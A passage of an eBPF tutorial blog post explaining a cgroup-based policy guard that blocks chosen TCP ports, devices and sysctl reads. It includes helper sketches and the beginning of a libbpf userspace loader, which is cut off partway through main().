&lt;/span&gt;        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* deny -&amp;gt; -EPERM */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Understanding the BPF Code
&lt;/h4&gt;

&lt;p&gt;The program is built around three cgroup hooks that handle network connections, device access, and sysctl reads/writes respectively. Each hook follows the same workflow: check whether the current operation matches the configured blocking rule; if it does, report an event through the ring buffer and return 0 (deny); otherwise return 1 (allow).&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;cg_connect4&lt;/code&gt; function uses &lt;code&gt;SEC("cgroup/connect4")&lt;/code&gt; to attach at IPv4 connection time. There's an important detail here: &lt;code&gt;ctx-&amp;gt;user_port&lt;/code&gt; is in network byte order (big-endian), while our configured port is in host byte order, so we must convert with &lt;code&gt;bpf_ntohs()&lt;/code&gt; before comparing. If the destination port matches our configured &lt;code&gt;blocked_tcp_dport&lt;/code&gt;, the program returns 0, and the userspace &lt;code&gt;connect()&lt;/code&gt; call fails with &lt;code&gt;EPERM&lt;/code&gt;.&lt;/p&gt;
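
&lt;p&gt;To make the byte-order point concrete, here is a minimal userspace sketch of the same comparison. It is not part of &lt;code&gt;cgroup_guard&lt;/code&gt;: &lt;code&gt;net16_from_bytes()&lt;/code&gt;, &lt;code&gt;net16_to_host()&lt;/code&gt;, and &lt;code&gt;connect4_verdict()&lt;/code&gt; are hypothetical helpers that only mimic what &lt;code&gt;bpf_ntohs()&lt;/code&gt; and the hook do, and the code assumes &lt;code&gt;unsigned short&lt;/code&gt; is 16 bits wide. It sticks to built-in types so it compiles without any headers.&lt;/p&gt;

```c
/* Illustrative stand-ins only: none of these helpers exist in cgroup_guard.
 * Assumption: unsigned short is exactly 16 bits wide. */

/* Build a 16-bit value whose in-memory bytes are {hi, lo}. This is how a
 * port looks in network byte order, whatever the host CPU is. */
unsigned short net16_from_bytes(unsigned char hi, unsigned char lo)
{
    union { unsigned short value; unsigned char bytes[2]; } u;

    u.bytes[0] = hi;
    u.bytes[1] = lo;
    return u.value;
}

/* Convert network byte order to host order by reading the raw bytes,
 * the same job bpf_ntohs() does inside the BPF program. */
unsigned short net16_to_host(unsigned short net)
{
    union { unsigned short value; unsigned char bytes[2]; } u;

    u.value = net;
    return (unsigned short)(u.bytes[0] * 256 + u.bytes[1]);
}

/* Mirror of the hook's verdict: 0 denies the connect(), 1 allows it. */
int connect4_verdict(unsigned short user_port_net,
                     unsigned short blocked_port_host)
{
    return net16_to_host(user_port_net) == blocked_port_host ? 0 : 1;
}
```

&lt;p&gt;Port 8080 travels as the bytes &lt;code&gt;0x1f 0x90&lt;/code&gt;, so &lt;code&gt;connect4_verdict(net16_from_bytes(0x1f, 0x90), 8080)&lt;/code&gt; returns 0. On a little-endian host the unconverted value would read as 36895, which is why a comparison without the conversion would never match.&lt;/p&gt;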

&lt;p&gt;The &lt;code&gt;cg_dev&lt;/code&gt; function handles device access. Its context &lt;code&gt;struct bpf_cgroup_dev_ctx&lt;/code&gt; contains three key fields: &lt;code&gt;major&lt;/code&gt; and &lt;code&gt;minor&lt;/code&gt; identify the device (e.g., &lt;code&gt;/dev/null&lt;/code&gt; is 1:3), and &lt;code&gt;access_type&lt;/code&gt; packs the device type (block or character) into its low 16 bits and the requested access (mknod, read, write) into its high 16 bits. The hook simply compares major:minor against the configured values and records &lt;code&gt;access_type&lt;/code&gt; in the event for reporting.&lt;/p&gt;
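
&lt;p&gt;The loader prints &lt;code&gt;access_type&lt;/code&gt; as a raw hexadecimal number, which is easy to misread because the kernel packs two things into it: the device type in the low 16 bits and the requested access flags in the high 16 bits. The sketch below shows one way to split the value. The enum values are copied from the kernel's &lt;code&gt;BPF_DEVCG_*&lt;/code&gt; constants and renamed so the snippet compiles without kernel headers; the &lt;code&gt;devcg_*&lt;/code&gt; helper names are hypothetical, and the cast assumes &lt;code&gt;unsigned short&lt;/code&gt; is 16 bits wide.&lt;/p&gt;

```c
/* Local copies of the kernel's BPF_DEVCG_* values from linux/bpf.h,
 * renamed so this sketch compiles without kernel headers. */
enum { DEVCG_DEV_BLOCK = 1, DEVCG_DEV_CHAR = 2 };
enum { DEVCG_ACC_MKNOD = 1, DEVCG_ACC_READ = 2, DEVCG_ACC_WRITE = 4 };

/* The device type lives in the low 16 bits of access_type.
 * Assumption: unsigned short is 16 bits, so the cast keeps exactly those. */
unsigned int devcg_dev_type(unsigned int access_type)
{
    return (unsigned short)access_type;
}

/* The requested access flags live in the high 16 bits. */
unsigned int devcg_access(unsigned int access_type)
{
    return access_type >> 16;
}

/* Hypothetical helper: a short label for the device type. */
const char *devcg_dev_type_name(unsigned int access_type)
{
    switch (devcg_dev_type(access_type)) {
    case DEVCG_DEV_BLOCK: return "block";
    case DEVCG_DEV_CHAR:  return "char";
    default:              return "unknown";
    }
}
```

&lt;p&gt;Under these assumptions, a read of a character device such as &lt;code&gt;/dev/null&lt;/code&gt; would be expected to show up as &lt;code&gt;access_type=0x20002&lt;/code&gt;: &lt;code&gt;devcg_dev_type()&lt;/code&gt; yields &lt;code&gt;DEVCG_DEV_CHAR&lt;/code&gt; and &lt;code&gt;devcg_access()&lt;/code&gt; yields &lt;code&gt;DEVCG_ACC_READ&lt;/code&gt;.&lt;/p&gt;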

&lt;p&gt;The &lt;code&gt;cg_sysctl&lt;/code&gt; function intercepts sysctl reads and writes under &lt;code&gt;/proc/sys/&lt;/code&gt;. It calls &lt;code&gt;bpf_sysctl_get_name()&lt;/code&gt; to get the sysctl name as a path such as &lt;code&gt;kernel/hostname&lt;/code&gt; (slash-separated, not dot-separated). We block only reads and let writes through, which keeps the demo safe to test: a plain read is enough to trigger the policy, and the guard never interferes with a configuration change.&lt;/p&gt;
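
&lt;p&gt;Because the name arrives slash-separated, a rule typed in the dotted form familiar from &lt;code&gt;sysctl(8)&lt;/code&gt; would never match. As a sketch of one way to accept both spellings, the hypothetical helper below (not part of &lt;code&gt;cgroup_guard&lt;/code&gt;) rewrites dots to slashes in place before the name is handed to the BPF program. It assumes no path component itself contains a dot, which does not hold for some network interface names.&lt;/p&gt;

```c
/* Hypothetical helper, not part of cgroup_guard: rewrite a dotted sysctl
 * name such as "kernel.hostname" in place into the slash-separated form
 * that bpf_sysctl_get_name() reports. Returns the number of separators
 * replaced. Assumes no path component itself contains a dot. */
int sysctl_dots_to_slashes(char *name)
{
    int replaced = 0;

    for (; *name != '\0'; name++) {
        if (*name == '.') {
            *name = '/';
            replaced++;
        }
    }
    return replaced;
}
```

&lt;p&gt;A name that is already slash-separated passes through unchanged and the function returns 0, so the helper could be applied to every &lt;code&gt;--deny-sysctl&lt;/code&gt; argument without checking its form first.&lt;/p&gt;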

&lt;p&gt;The configuration options at the top of the program are declared as &lt;code&gt;const volatile&lt;/code&gt;. This is the standard libbpf pattern for load-time configuration, used throughout CO-RE (Compile Once, Run Everywhere) tools: the values hold their defaults (0 or an empty string) at compile time, and userspace overwrites them through &lt;code&gt;skel-&amp;gt;rodata-&amp;gt;&lt;/code&gt; after &lt;code&gt;open()&lt;/code&gt; but before &lt;code&gt;load()&lt;/code&gt;. Once the program is loaded the read-only data is frozen, so the values can no longer be changed. This allows a single compiled BPF program to run with different configurations.&lt;/p&gt;

&lt;h3&gt;
  
  
  Userspace Loader: cgroup_guard.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause&lt;/span&gt;
&lt;span class="cm"&gt;/* cgroup_guard.c - Userspace loader for cgroup eBPF policy guard */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;errno.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;fcntl.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;getopt.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;signal.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/resource.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/stat.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;arpa/inet.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"cgroup_guard.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"cgroup_guard.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;sig_atomic_t&lt;/span&gt; &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;sig&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;sig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;libbpf_print_level&lt;/span&gt; &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                           &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;va_list&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;level&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;LIBBPF_DEBUG&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;vfprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s"&gt;"Usage: %s [OPTIONS]&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"Options:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -c, --cgroup PATH           cgroup v2 path (default: /sys/fs/cgroup/ebpf_demo)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -p, --block-port PORT       block TCP connect() to this dst port (IPv4)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -d, --deny-device MAJ:MIN   deny device access for (major:minor)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -s, --deny-sysctl NAME      deny sysctl READ of this name&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -h, --help                  show this help&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;data_sz&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;data_sz&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;EVENT_CONNECT4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;INET_ADDRSTRLEN&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;in_addr&lt;/span&gt; &lt;span class="n"&gt;addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;s_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="n"&gt;inet_ntop&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[DENY connect4] pid=%u comm=%s daddr=%s dport=%u proto=%u&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proto&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;EVENT_DEVICE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[DENY device]   pid=%u comm=%s major=%u minor=%u access_type=0x%x&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;major&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;minor&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;access_type&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;EVENT_SYSCTL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[DENY sysctl]   pid=%u comm=%s write=%u name=%s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;fflush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;cgroup_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"/sys/fs/cgroup/ebpf_demo"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;block_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
